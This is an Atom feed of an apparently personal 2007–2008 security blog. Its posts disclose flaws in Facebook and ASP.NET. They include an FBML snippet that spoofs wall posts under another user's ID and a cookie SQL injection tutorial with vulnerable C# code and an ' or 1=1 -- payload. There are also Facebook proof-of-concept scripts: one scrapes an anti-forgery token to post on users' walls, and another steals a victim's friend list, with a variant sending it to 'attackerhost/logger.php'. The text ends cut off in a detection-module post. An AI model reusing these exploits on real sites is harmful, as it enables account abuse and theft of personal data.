http://barmagy.com/blogs/infinite_loop/atom.aspxCommunity Server2007-06-24T22:13:00Zhttp://barmagy.com/blogs/infinite_loop/archive/2008/01/20/1054.aspx2008-01-20T18:32:00Z2008-01-20T18:32:00Z<FONT face=Calibri> <P class=MsoNormal>Today while playing around with <A href="http://wiki.developers.facebook.com/index.php/FBML"><FONT color=#800080>Facebook markup language (FBML)</FONT></A> which is used in Facebook applications I found that through using the tag <SPAN>&lt;/fb:wallpost&gt; </SPAN>it’s possible to fake user posts with ease just by using their user id as Facebook don’t validate that if the posts is really originating from the legitimate user so it allows anybody to use FBML to post wall posts to his/her application with the identity of another user. Here is proof of concept FMBL that you can use in your Facebook application</P> <P class=MsoNormal><SPAN>&lt;fb:wall&gt;<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp; </SPAN>&lt;fb:wallpost uid="[victim id goes here]"&gt;<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>Fady ownz me<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp; </SPAN>&lt;/fb:wallpost&gt;<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN>&lt;/fb:wall&gt;<o:p></o:p></SPAN></P> <P class=MsoNormal></FONT></P><img src="http://barmagy.com/aggbug.aspx?PostID=1054" width="1" height="1">Fadyhttp://barmagy.com/members/Fady.aspxhttp://barmagy.com/blogs/infinite_loop/archive/2007/12/30/1023.aspx2007-12-30T18:31:00Z2007-12-30T18:31:00Z<P class=MsoNormal><FONT face=Calibri>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Through my career as a developer I’ve seen many developers that are not aware about the possibility of SQL injection through cookies. Cookies in fact is a user input and as any input it must be validated and because normal users don’t see cookies that doesn’t mean attackers won’t temper with it, so developers must always validate cookies the same way they validate any other type of input. I will demonstrate in this article how it’s possible to an attacker to make a SQL injection attack through cookies. Say we have a web application admin page that hashes the admin password and store it in a cookie so next time the admin opens the web application administrator panel web page the application will recognize him/her as admin, the password is hashed in a cookie so it won’t be stored in plain text in cookies which is a bad security practice. So let’s say we have the following code</FONT></P> <P class=MsoNormal><SPAN><SPAN>&nbsp; </SPAN><SPAN>protected</SPAN> <SPAN>void</SPAN> Page_Load(<SPAN>object</SPAN> sender, <SPAN>EventArgs</SPAN> e)<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>{<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN><SPAN>if</SPAN> (Request.Cookies.Get(<SPAN>"password_hash"</SPAN>) != <SPAN>null</SPAN>)<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>{<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN><SPAN>//check if the password hash is authentic<o:p></o:p></SPAN></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN><SPAN>string</SPAN> sql = <SPAN>"select count(id) from admins where password_hash = '"</SPAN> + Request.Cookies.Get(<SPAN>"password_hash"</SPAN>) + <SPAN>"'"</SPAN>;<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN><SPAN>//the rest of database access code and admin<o:p></o:p></SPAN></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN><SPAN>//authentication goes here<o:p></o:p></SPAN></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>}<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN><SPAN>else</SPAN> Response.Redirect(<SPAN>"login.aspx"</SPAN>);<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN><o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>}<o:p></o:p></SPAN></P> <P class=MsoNormal><FONT face=Calibri>Now the code looks pretty sweet and simple, if there is no cookie the admin will be redirected to the login page else we will check if the password hash exists in the database or not, if yes we will log in the admin if not then the cookie has expired and we will redirect the admin to the login page, the cookie is hashed so if an attacker managed to get it, at least it won’t be in a plain text format and also it’s a hash (i.e. one<SPAN>&nbsp; </SPAN>way encryption) so the attacker will have a hard time cracking it and anyway by the time the attacker will get the hash it will be expired anyway. And of course there will be a security policy that forces our admin to change the password every 10 days. So now our security plan sounds pretty hard to break. </FONT></P> <P class=MsoNormal><FONT face=Calibri>Our admin cookie should look like this</FONT></P> <P class=MsoNormal><SPAN>GET /admin/admins.aspx HTTP/1.1<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN>Accept: */*<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN>Accept-Language: en-us<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN>UA-CPU: x86<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN>Accept-Encoding: gzip, deflate<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN>User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.590; .NET CLR 3.5.20706)<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN>Proxy-Connection: Keep-Alive<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN>Host: www.host.com<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN>Pragma: no-cache<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN>Cookie: password_hash=d41d8cd98f00b204e9800998ecf8427e<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><o:p>&nbsp;</o:p></SPAN></P> <P class=MsoNormal><FONT face=Calibri>But what if an attacker tempered with the cookies and sent us a GET request that looks like this</FONT></P> <P class=MsoNormal><SPAN>GET /admin/admins.aspx HTTP/1.1<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN>Accept: */*<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN>Accept-Language: en-us<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN>UA-CPU: x86<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN>Accept-Encoding: gzip, deflate<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN>User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.590; .NET CLR 3.5.20706)<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN>Proxy-Connection: Keep-Alive<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN>Host: www.host.com<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN>Pragma: no-cache<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN>Cookie: password_hash=</SPAN><FONT face=Calibri> SorryIDontHaveYourHash</FONT><SPAN> ' or 1=1 --<o:p></o:p></SPAN></P> <P class=MsoNormal><o:p><FONT face=Calibri>&nbsp;</FONT></o:p></P> <P class=MsoNormal><o:p></o:p><FONT face=Calibri>Pay some attention to the cookie line</FONT></P> <P class=MsoNormal><FONT face=Calibri>Cookie: password_hash=SorryIDontHaveYourHash' or 1=1 --</FONT></P> <P class=MsoNormal><FONT face=Calibri>Notice what it has in its end? Now let’s imagine how our SQL query will look like if the attacker did this</FONT></P> <P class=MsoNormal><SPAN>select</SPAN><SPAN> <SPAN>count</SPAN><SPAN>(</SPAN>id<SPAN>)</SPAN> <SPAN>from</SPAN> admins <SPAN>where</SPAN> password_hash <SPAN>=</SPAN> <SPAN>'SorryIDontHaveYourHash'</SPAN> <SPAN>or</SPAN> 1<SPAN>=</SPAN>1 <SPAN>--'<o:p></o:p></SPAN></SPAN></P> <P class=MsoNormal><FONT face=Calibri>This SQL query will return records every time it executes and our application will think that the cookie have a valid password hash although it doesn’t and will log the attacker as the admin. I hope you now understand the dangers that come from not validating your cookies the same as you validate user input. Thanks for reading and I would really appreciate your feedback.</FONT></P><A href="http://www.dotnetkicks.com/kick/?url=http%3a%2f%2fbarmagy.com%2fblogs%2finfinite_loop%2farchive%2f2007%2f12%2f30%2f1023.aspx"><IMG alt="kick it on DotNetKicks.com" src="http://www.dotnetkicks.com/Services/Images/KickItImageGenerator.ashx?url=http%3a%2f%2fbarmagy.com%2fblogs%2finfinite_loop%2farchive%2f2007%2f12%2f30%2f1023.aspx" border=0></A><img src="http://barmagy.com/aggbug.aspx?PostID=1023" width="1" height="1">Fadyhttp://barmagy.com/members/Fady.aspxhttp://barmagy.com/blogs/infinite_loop/archive/2007/12/27/1013.aspx2007-12-27T16:00:00Z2007-12-27T16:00:00Z<P class=MsoNormal><FONT face=Calibri><SPAN>In Facebook if a user is logged in with the “Remember Me” option an attacker can make requests on behalf of the user to make wall posts by sending him/her a URL that contains ajax java script code that will call the Facebook services and do the post on behalf of the user using his/her stored credentials in the browser cookies. Facebook actually have anticipated this attack and used a technique that generates a random hash that is used as an authentication token with every request to their services to insure that the request have been done by the user himself and is originating from the Facebook ajax java script, this token is rendered in the Facebook html and must be sent with each request or it will be ignored, but this token can be obtained by the attacker by simply requesting the page first with the user credentials (which is stored on the user machine in browser cookies), then the attacker can proceed with the attack. I’ve written a proof of concept code for this issue. This code if executed by the user it will post the “Proof of Concept” message on the user wall. You can also change the code so it can post on others walls.</SPAN><SPAN><o:p></o:p></SPAN></FONT></P> <P class=MsoNormal><SPAN>&lt;</SPAN><SPAN>script</SPAN><SPAN>&gt;</SPAN><SPAN><o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN>xmlHttp = GetXmlHttpObject()<SPAN><o:p></o:p></SPAN></SPAN></P> <P class=MsoNormal><SPAN>var</SPAN><SPAN> url = "http://www.facebook.com"<SPAN><o:p></o:p></SPAN></SPAN></P> <P class=MsoNormal><SPAN>xmlHttp.onreadystatechange=stateChanged<SPAN><o:p></o:p></SPAN></SPAN></P> <P class=MsoNormal><SPAN>xmlHttp.open("GET",url,<SPAN>true</SPAN>)<SPAN><o:p></o:p></SPAN></SPAN></P> <P class=MsoNormal><SPAN>xmlHttp.send(<SPAN>null</SPAN>)<SPAN><o:p></o:p></SPAN></SPAN></P> <P class=MsoNormal><SPAN><o:p>&nbsp;</o:p></SPAN></P> <P class=MsoNormal><SPAN>function</SPAN><SPAN> stateChanged() <SPAN><o:p></o:p></SPAN></SPAN></P> <P class=MsoNormal><SPAN>{<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN></SPAN><SPAN>if</SPAN><SPAN> (xmlHttp.readyState==4)<SPAN><o:p></o:p></SPAN></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>{<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN><SPAN>//here we get the current logged in user id<SPAN><o:p></o:p></SPAN></SPAN></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN><SPAN>var</SPAN> user = xmlHttp.responseText.substring(xmlHttp.responseText.indexOf('name="user" value="') + 19, xmlHttp.responseText.indexOf('"', xmlHttp.responseText.indexOf('name="user" value="') + 19))<SPAN><o:p></o:p></SPAN></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN><SPAN>//then we get the token hash that must be sent with every request<SPAN><o:p></o:p></SPAN></SPAN></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN><SPAN>var</SPAN> post_form_id = xmlHttp.responseText.substring(xmlHttp.responseText.indexOf('name="post_form_id" value="') + 27, xmlHttp.responseText.indexOf('"', xmlHttp.responseText.indexOf('name="post_form_id" value="') + 27))<SPAN><o:p></o:p></SPAN></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN><SPAN>var</SPAN> xmlHttpPost = GetXmlHttpObject()<SPAN><o:p></o:p></SPAN></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>xmlHttpPost.open("POST", "http://www.facebook.com/ajax/wallpost_ajax.php", <SPAN>true</SPAN>)<SPAN><o:p></o:p></SPAN></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>xmlHttpPost.setRequestHeader("Content-Type","application/x-www-form-urlencoded")<SPAN><o:p></o:p></SPAN></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN><SPAN>//we will make a post to the current user wall<SPAN><o:p></o:p></SPAN></SPAN></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN><SPAN>//we can make posts to other users walls too<SPAN><o:p></o:p></SPAN></SPAN></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN><SPAN>//by changing the "to" parameter to another user ID<SPAN><o:p></o:p></SPAN></SPAN></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>xmlHttpPost.send("to=" + user + "&amp;from=" + user + "&amp;wall_text=Proof of Concept&amp;post_form_id=" + post_form_id + "&amp;post_form_id=" + post_form_id)<SPAN><o:p></o:p></SPAN></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>}<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN>}<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><o:p>&nbsp;</o:p></SPAN></P> <P class=MsoNormal><SPAN>function</SPAN><SPAN> GetXmlHttpObject()<SPAN><o:p></o:p></SPAN></SPAN></P> <P class=MsoNormal><SPAN>{<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp; </SPAN></SPAN><SPAN></SPAN><SPAN><SPAN></SPAN>//i didn't add the code to create the XHR object for firefox because<SPAN><o:p></o:p></SPAN></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp; </SPAN></SPAN><SPAN></SPAN><SPAN><SPAN></SPAN>//it doesn't work on firefox already, if you have time to test this <SPAN><o:p></o:p></SPAN></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp; </SPAN></SPAN><SPAN></SPAN><SPAN><SPAN></SPAN>//POC with other browsers and it worked please let me know<SPAN><o:p></o:p></SPAN></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp; </SPAN></SPAN><SPAN>var</SPAN><SPAN> xmlHttp<SPAN><o:p></o:p></SPAN></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN></SPAN><SPAN>try<SPAN><o:p></o:p></SPAN></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>{<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN></SPAN><SPAN>xmlHttp=<SPAN>new</SPAN> ActiveXObject("Msxml2.XMLHTTP")<SPAN><o:p></o:p></SPAN></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>}<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN></SPAN><SPAN>catch</SPAN><SPAN> (e)<SPAN><o:p></o:p></SPAN></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>{<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN></SPAN><SPAN>xmlHttp=<SPAN>new</SPAN> ActiveXObject("Microsoft.XMLHTTP")<SPAN><o:p></o:p></SPAN></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>}<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp; </SPAN></SPAN><SPAN>return</SPAN><SPAN> xmlHttp<SPAN><o:p></o:p></SPAN></SPAN></P> <P class=MsoNormal><SPAN>}<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><o:p>&nbsp;</o:p></SPAN></P> <P class=MsoNormal><SPAN></SPAN><SPAN><SPAN></SPAN>&lt;/</SPAN><SPAN>script</SPAN><SPAN>&gt;<SPAN><o:p></o:p></SPAN></SPAN></P> <P class=MsoNormal><o:p><FONT face=Calibri>&nbsp;</FONT></o:p></P><img src="http://barmagy.com/aggbug.aspx?PostID=1013" width="1" height="1">Fadyhttp://barmagy.com/members/Fady.aspxhttp://barmagy.com/blogs/infinite_loop/archive/2007/12/23/1001.aspx2007-12-23T20:22:00Z2007-12-23T20:22:00Z<FONT face=Calibri> <P class=MsoNormal><SPAN>Today I was taking a look at the Facebook AJAX java script that is responsible to give suggestions in the search text box you find under the Facebook logo on the left<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN>I found this URL <A href="http://www.facebook.com/ajax/typeahead_search.php?"><FONT color=#800080>http://www.facebook.com/ajax/typeahead_search.php?</FONT></A> hard coded in the following java script<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN>function</SPAN><SPAN> search_friend_source(get_param)<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN>{<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN>this</SPAN><SPAN>.parent.construct(<SPAN>this</SPAN>,get_param);<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN>new</SPAN><SPAN> AsyncRequest().setMethod(<SPAN>'GET'</SPAN>).setReadOnly(<SPAN>true</SPAN>).setURI(<SPAN>'/ajax/typeahead_search.php?'</SPAN>+get_param).setErrorHandler(<SPAN>function</SPAN>(){}).setHandler(<SPAN>function</SPAN>(response){<SPAN>this</SPAN>.values=response.getPayload().entries;<SPAN>this</SPAN>.build_index();}.bind(<SPAN>this</SPAN>)).send();}<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN>at the file </SPAN><SPAN><A href="http://static.ak.facebook.com/js/typeaheadpro.js?44:75333"><SPAN>http://static.ak.facebook.com/js/typeaheadpro.js?44:75333</SPAN></A></SPAN><SPAN><o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN>Whenever you open that URL from any browser it supplies you with a complete list of all your friends on Facebook in a java script format similar to JSON, it uses your credentials that is stored in your cookies in the browser to authenticate you.<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN>Once I’ve seen it I’ve known instantly that I’ve found a security vulnerability similar to the famous </SPAN><SPAN><A href="http://it.slashdot.org/article.pl?sid=07/01/01/1350219&amp;from=rss"><SPAN><FONT color=#800080>Gmail XSS vulnerability</FONT></SPAN></A></SPAN><SPAN>, anybody with proper AJAX knowledge can host a java script on their site to request this page using your credentials and get all your of your Facebook friends list, so I made this proof of concept code to demonstrate the vulnerability<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN>&lt;</SPAN><SPAN>script</SPAN><SPAN>&gt;<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN>xmlHttp=GetXmlHttpObject()</SPAN></P> <P class=MsoNormal><SPAN>var</SPAN><SPAN> url=<SPAN>http://www.facebook.com/ajax/typeahead_search.php?</SPAN>;</SPAN></P> <P class=MsoNormal><SPAN>xmlHttp.onreadystatechange=stateChanged;<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN>xmlHttp.open(<SPAN>"GET"</SPAN>,url,<SPAN>true</SPAN>);<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN>xmlHttp.send(<SPAN>null</SPAN>);<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><o:p>&nbsp;</o:p></SPAN></P> <P class=MsoNormal><SPAN>function</SPAN><SPAN> stateChanged() <o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN>{<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN><SPAN>if</SPAN> (xmlHttp.readyState==4)<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>{<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>alert(xmlHttp.responseText)<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>}<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN>}<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><o:p>&nbsp;</o:p></SPAN></P> <P class=MsoNormal><SPAN>function</SPAN><SPAN> GetXmlHttpObject()<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN>{<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp; </SPAN>//i didn't add the code to create the XHR object for firefox because<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp; </SPAN><SPAN>//it doesn't work on firefox already, if you have time to test this <o:p></o:p></SPAN></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp; </SPAN><SPAN>//POC with other browsers and it worked please let me know</SPAN><o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp; </SPAN><SPAN>var</SPAN> xmlHttp=<SPAN>null</SPAN>;<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN><SPAN>try<o:p></o:p></SPAN></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>{<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>xmlHttp=<SPAN>new</SPAN> ActiveXObject(<SPAN>"Msxml2.XMLHTTP"</SPAN>);<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>}<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN><SPAN>catch</SPAN> (e)<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>{<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>xmlHttp=<SPAN>new</SPAN> ActiveXObject(<SPAN>"Microsoft.XMLHTTP"</SPAN>);<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>}<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp; </SPAN><SPAN>return</SPAN> xmlHttp;<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN>}<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><o:p>&nbsp;</o:p></SPAN></P> <P class=MsoNormal><SPAN>&lt;/</SPAN><SPAN>script</SPAN><SPAN>&gt;<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><o:p>&nbsp;</o:p></SPAN></P> <P class=MsoNormal><SPAN>If you opened any web page on the internet that contains that code and you are logged on Facebook at that time (i.e. your browser still have your credentials stored in your cookies) it will show you a message containing the java script return from Facebook with all your friends and there public data like there profile URL and their networks. These data can instead be sent to an attacker and get logged like this<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN>function</SPAN><SPAN> stateChanged() <o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN>{<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN><SPAN>if</SPAN> (xmlHttp.readyState==4)<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>{<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN><SPAN>var</SPAN> xmlHttpLogger=GetXmlHttpObject()<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </SPAN>xmlHttpLogger.open(<SPAN>"GET"</SPAN>, <SPAN>"http://attackerhost/logger.php?log="</SPAN> + xmlHttp.responseText, <SPAN>true</SPAN>)<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><SPAN>&nbsp;&nbsp;&nbsp; </SPAN>}<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN>}<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN>So if you opened a page containing this version it will not alert you and instead it will send your Facebook contact list the attacker silently.<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN>I’ve tested this proof of concept only with IE7 and it’s working fine, also I’ve tried it with Firefox and it doesn’t work because of the “same domain security policy” in Firefox. <SPAN>&nbsp;</SPAN>If you have some time to test it with other browsers please inform me with the results, thanks.<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN><o:p>&nbsp;</o:p></SPAN></P> <P class=MsoNormal></FONT></P><A href="http://www.dotnetkicks.com/kick/?url=Today+I+was+taking+a+look+at+the+Facebook+AJAX+java+script+that+is+responsible+to+give+suggestions+in+the+search+text+box+you+find+under+the+Facebook+logo+on+the+left"><IMG alt="kick it on DotNetKicks.com" src="http://www.dotnetkicks.com/Services/Images/KickItImageGenerator.ashx?url=Today+I+was+taking+a+look+at+the+Facebook+AJAX+java+script+that+is+responsible+to+give+suggestions+in+the+search+text+box+you+find+under+the+Facebook+logo+on+the+left" border=0></A><img src="http://barmagy.com/aggbug.aspx?PostID=1001" width="1" height="1">Fadyhttp://barmagy.com/members/Fady.aspxhttp://barmagy.com/blogs/infinite_loop/archive/2007/12/17/983.aspx2007-12-16T22:18:00Z2007-12-16T22:18:00Z<P class=MsoNormal><FONT face=Calibri>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Here is a nice trick to help you to detect hackers in action while trying to hack your web applications. The idea is very simple, we want to set a layer there between your application and the internet to watch the web traffic for anything suspicious. These suspicious things might be a query string that contains a XSS script or a SQL injection query. So we will monitor the web traffic that is passing through that layer for well known and common patterns of attack methods that most hackers use to scan your web applications for vulnerabilities. We will use http modules to implement that layer, here is some dirty code to demonstrate the idea.</FONT></P> <P class=MsoNormal><SPAN>using</SPAN><SPAN> System;<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN>using</SPAN><SPAN> System.Data;<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN>using</SPAN><SPAN> System.Configuration;<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN>using</SPAN><SPAN> System.Web;<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN>using</SPAN><SPAN> System.Web.Security;<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN>using</SPAN><SPAN> System.Web.UI;<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN>using</SPAN><SPAN> System.Web.UI.WebControls;<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN>using</SPAN><SPAN> System.Web.UI.WebControls.WebParts;<o:p></o:p></SPAN></P> <P class=MsoNormal><SPAN>using</SPAN><SPAN> System.Web.UI.HtmlControls;<o:p></o:p></SPAN></P> <P 